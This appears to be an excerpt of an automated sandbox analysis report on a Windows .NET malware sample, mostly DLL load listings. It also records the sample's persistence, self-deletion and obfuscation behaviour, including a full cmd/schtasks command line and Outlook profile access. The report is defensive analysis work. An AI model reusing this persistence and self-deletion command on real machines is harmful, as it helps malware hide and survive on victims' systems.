Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: msasn1.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: libcrypto.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\chcp.com Section loaded: ulib.dll
Source: C:\Windows\System32\chcp.com Section loaded: fsutilext.dll
Source: C:\Windows\System32\netsh.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mfc42u.dll
Source: C:\Windows\System32\netsh.exe Section loaded: authfwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwpolicyiomgr.dll
Source: C:\Windows\System32\netsh.exe Section loaded: firewallapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcmonitor.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3cfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dot3api.dll
Source: C:\Windows\System32\netsh.exe Section loaded: onex.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\netsh.exe Section loaded: eappprxy.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\netsh.exe Section loaded: fwcfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: hnetmon.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netshell.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netsetupapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: netiohlp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nettrace.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: httpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: userenv.dll
Source: C:\Windows\System32\netsh.exe Section loaded: activeds.dll
Source: C:\Windows\System32\netsh.exe Section loaded: polstore.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winipsec.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: adsldpc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: nshwfp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cabinet.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2pnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: p2p.dll
Source: C:\Windows\System32\netsh.exe Section loaded: profapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rpcnsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcnnetsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlanapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: whhelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wlancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wshelper.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wevtapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwancfg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wwapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wcmapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: rmclient.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mobilenetworking.dll
Source: C:\Windows\System32\netsh.exe Section loaded: peerdistsh.dll
Source: C:\Windows\System32\netsh.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\netsh.exe Section loaded: slc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: sppc.dll
Source: C:\Windows\System32\netsh.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\netsh.exe Section loaded: ktmw32.dll
Source: C:\Windows\System32\netsh.exe Section loaded: mprmsg.dll
Source: C:\Windows\System32\netsh.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\netsh.exe Section loaded: wldp.dll
Source: C:\Windows\System32\netsh.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: libcrypto.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: napinsp.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: pnrpnsp.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: wshbth.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: nlaapi.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: winrnr.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: ntmarta.dll
Source: C:\Windows\System32\OpenSSH\ssh.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: httpapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Roaming\manager.exe Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Roaming\manager.exe Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Roaming\manager.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Roaming\manager.exe Section loaded: version.dll
Source: C:\Users\user\AppData\Roaming\manager.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Roaming\manager.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\manager.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Roaming\manager.exe Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Roaming\manager.exe Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Roaming\manager.exe Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Roaming\manager.exe Section loaded: wldp.dll
Source: C:\Users\user\AppData\Roaming\manager.exe Section loaded: propsys.dll
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{5E5F29CE-E0A8-49D3-AF32-7A7BDC173478}\InProcServer32
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Users\user\Desktop\0LpFv1haTA.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 Jump to behavior
Source: 0LpFv1haTA.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
Source: 0LpFv1haTA.exe Static file information: File size 9593944 > 1048576
Source: 0LpFv1haTA.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: System.Xml.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.ni.pdbRSDS source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.pdbN|2h|2 Z|2_CorDllMainmscoree.dll source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Drawing.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Configuration.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: mscorlib.ni.pdbRSDS7^3l source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Configuration.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Drawing.ni.pdbRSDS source: WER895A.tmp.dmp.36.dr
Source: Binary string: rlib.pdb source: 0LpFv1haTA.exe, 0000000D.00000002.2450732907.000001E4629D4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Xml.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.pdb source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmp, WER895A.tmp.dmp.36.dr
Source: Binary string: System.Xml.ni.pdbRSDS# source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Core.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Windows.Forms.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: mscorlib.pdb source: 0LpFv1haTA.exe, 0000000D.00000002.2440409629.000001E449ED9000.00000004.00000800.00020000.00000000.sdmp, WER895A.tmp.dmp.36.dr
Source: Binary string: \??\C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.PDB,D source: 0LpFv1haTA.exe, 0000000D.00000002.2450732907.000001E4629D4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Management.ni.pdbRSDSJ< source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Windows.Forms.ni.pdbRSDS source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Drawing.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Management.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: mscorlib.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Management.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: rlib.pdba source: 0LpFv1haTA.exe, 0000000D.00000002.2450732907.000001E4629D4000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Core.pdb` source: WER895A.tmp.dmp.36.dr
Source: Binary string: mscorlib.pdb ` source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Drawing.pdb` source: WER895A.tmp.dmp.36.dr
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System\v4.0_4.0.0.0__b77a5c561934e089\System.pdbh source: 0LpFv1haTA.exe, 0000000D.00000002.2450732907.000001E4629A0000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Configuration.ni.pdbRSDScUN source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Configuration.pdbP source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.ni.pdb source: WER895A.tmp.dmp.36.dr
Source: Binary string: System.Core.ni.pdbRSDS source: WER895A.tmp.dmp.36.dr

Data Obfuscation

Source: manager.exe.7.dr, DllHandler.cs .Net Code: DllNodeHandler System.Reflection.Assembly.Load(byte[])
Source: manager.exe.7.dr, DllHandler.cs .Net Code: DllNodeHandler
Source: manager.exe.41.dr, DllHandler.cs .Net Code: DllNodeHandler System.Reflection.Assembly.Load(byte[])
Source: manager.exe.41.dr, DllHandler.cs .Net Code: DllNodeHandler
Source: 0LpFv1haTA.exe Static PE information: 0xC879E997 [Fri Jul 31 14:54:15 2076 UTC]
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Code function: 0_2_00007FF848F000BD pushad ; iretd 0_2_00007FF848F000C1
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 7_2_00007FF848F100BD pushad ; iretd 7_2_00007FF848F100C1
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 13_2_00007FF848F100BD pushad ; iretd 13_2_00007FF848F100C1
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 40_2_00007FF848F200BD pushad ; iretd 40_2_00007FF848F200C1
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 46_2_00007FF848F300BD pushad ; iretd 46_2_00007FF848F300C1
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 47_2_00007FF848F100BD pushad ; iretd 47_2_00007FF848F100C1
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Code function: 48_2_00007FF848F100BD pushad ; iretd 48_2_00007FF848F100C1
Source: C:\Users\user\AppData\Roaming\manager.exe File created: C:\Users\user\AppData\Roaming\XenoManager\manager.exe
Source: C:\Users\user\Desktop\0LpFv1haTA.exe File created: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe File created: C:\Users\user\AppData\Roaming\manager.exe

Boot Survival

Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\schtasks.exe schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f

Hooking and other Techniques for Hiding and Protection

Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process created: "C:\Windows\System32\cmd.exe" /C chcp 65001 && timeout /t 3 > NUL && schtasks /create /tn "0LpFv1haTA" /sc MINUTE /tr "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe" /rl HIGHEST /f && DEL /F /S /Q /A "C:\Users\user\Desktop\0LpFv1haTA.exe" &&START "" "C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe"
Source: unknown Network traffic detected: HTTP traffic on port 49739 -> 8817
Source: unknown Network traffic detected: HTTP traffic on port 8817 -> 49739
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Local\Starlabs\0LpFv1haTA.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
Source: C:\Windows\System32\WerFault.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\manager.exe Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\manager.exe Process information set: NOOPENFILEERRORBOX
